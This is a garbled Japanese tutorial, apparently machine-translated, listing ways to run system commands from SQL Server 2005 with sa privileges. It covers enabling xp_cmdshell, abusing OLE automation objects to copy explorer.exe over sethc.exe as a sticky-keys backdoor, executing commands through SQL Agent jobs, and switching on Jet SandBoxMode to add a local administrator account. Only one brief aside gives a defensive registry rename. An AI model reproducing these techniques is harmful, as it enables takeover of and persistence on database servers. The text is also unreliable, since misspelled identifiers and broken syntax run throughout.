sql 2005 sa実行命令方法まとめ

一.xp_cmdshell EXECマスタード.xp_cmdshell'ipconfig'オープンxp_cmdshell:--To allow advanced options to be changed.EXEC sp_configre'show advanced options'は、1 GO--To up date the currently configred value for advance options.RECONFIGURE GO--To enable the feature.EXEC sp_configre'xp_cmdshell'は、1 GO--To up date the currently configred value for this feat ure.RECONFIGURE GO 2.sp_oacreat作成wscript.shell対象use master declare@o int exec sp_oacreate'wscript.shell'，@o out exec sp_oamethod@o，'run'，null，'cmd/c"net user">c:\test.tmp'はscripting.filesysteembjectオブジェクトdeclare@o int exsp_を作成します。oacreat'scripting.filesysteemoject'，@o out exec sp_oamethod@o，'copyfile'，null，'c:\windows\explorer.exe'，'c:\windows\system 32\sethc.exe'declare@oo int exec sp_oacreate'scripting.filesysteemoject'，@oo out exec sp_oamethod@oo，'copyfile'，null，'c:\windows\system 32\sethc.exe'，'c:\windows\system 32\dll cache\sethc.exe';utilman.exeを使ってsethc.exeの代わりに、同じ効果の後門がクールですか？Shell.Applicationの対象declare@o int exec sp_を作成します。oacreat'Shell.Appplication'，@o out exec sp_oamethod@o，'Shell Execute'，null，'cmd.exe'，'cmd/c net user'c:\test.txt'，'c:\windows\system 32'，''1;OLIE Automation Procesdues spをオープンします。configure'show advanced options'1;GO RECONFIGUREGO sp_configre'Ole Automation Procesdues'は、1;GO RECONFIGUREGO私達の対策は対象を手足にしてWScript.ShellはシステムカーネルのDOS基本命令を呼び出すことができます。レジストリを修正して、このコンポーネントを改名して、危害を防止します。HKEY_CLASSES_ROOT\WScript.Shell\及びHKEY_CLASSES_ROOT\WScript.Shell.1\他の名前に改名しました。例えば、WScript.Shell_に変更しました。Change NameまたはWScript.Shell.1_Change Name自身が後で呼び出した時にこれを使えば、正常にこのコンポーネントを呼び出すことができます。clsidの値もHKEY_に変えます。CLASSES_ROOT\WScript.Shell\CLSID\プロジェクトの値HKEY_CLASSES_ROOT\WScript.shell理、scripting.filesystemboject、Shell.Appleication 3.JOBはJOBを利用して命令を実行します。SQLSERVERRAGENTサービスをオープンするという前提条件があります。以下の文はexmasterd.boxpを開くことができます。servicecontrol'start'は、'SQLSERVERRAGENT'use msdb create table[jncsql]ext nvarhal(1024)null)exsp_delete_job null、'x'exec sp uadd_job'x'exec sp_add_jobstep null、'x'，null，'1'，'cmd exec'，'cmd/c'net user'c:\test.test'exec sp_add_jobserver null、'x'、@servername exec sp_startjob四.SandBoxMode（ネットでよく言われるサンドボックスモード）原理：accessでVBSのshell関数を呼び出して、system権限で任意のコマンドを実行します。しかし、この関数を試用する前に、レジストリの中のSandBoxmodeというスイッチを入れなければなりません。レジストリ：HKEY_LOCAL_MACHINE\SoFtWare\Miris off\Jet\4.0\Engine\SandBoxmode.デフォルト値は2です。この人のキー値は0です。ずっとSandBoxmodeモードを無効にしています。命令EXEC sp_は1または0で実行できます。addll inkedserver'testsql'は、'OLIE DB Provider for Jet'は、'Microsoft.Jett.OLED B.4..0'、'c:\windows\system 32\ias.mdb'execmart.xpregwrite'HKEY_LOCAL_MACHINE'は、'SOFTWARE\Microsoft\Jet\4.0\Entines'、'SandBoxMode'、'REG_DWORD'，1 EXEC master.xp_regread HKEY_LOCAL_MACHINE、'Software\Microsoft\Jet\4.0\engins'は、'SandBoxMode'select*from openrowut('microsoff.jet.oleb.4.0';database=c:\windows\system 32\ias\ias.mdb'、'select shell("cmd.exe/c net user test/add")select*from openrowut('microsoff.ject.oledb.4.0')database=c:\windows\system 32\ias\ias.mdb'、'select shell("cmd.exe/c net localtroup administrators test/add")'以下はシステムが持っている2つのmdbファイルCです。思考を発散させて、いくつかの種類を探し出してもいいです。デフォルトの状況でテストします。浸透しやすい時には多くの制限条件があります。一つ一つ克服して、コンポーネントを利用してサーバの情報を得て、読み取り、ファイルを作成しました。やはり権限というフレーズに対して深い理解が必要です。付注に関しては＊.exe c:\windows\system 32\\そしてc:\windows\system 32\dlcacheです。cmd.exeに関してはまたcommand.exeがあります。net.exeについてはnet.exeがあります。Mdbファイルは存在しません。アップロードできます。命令を実行するコンポーネントは一つだけではありません。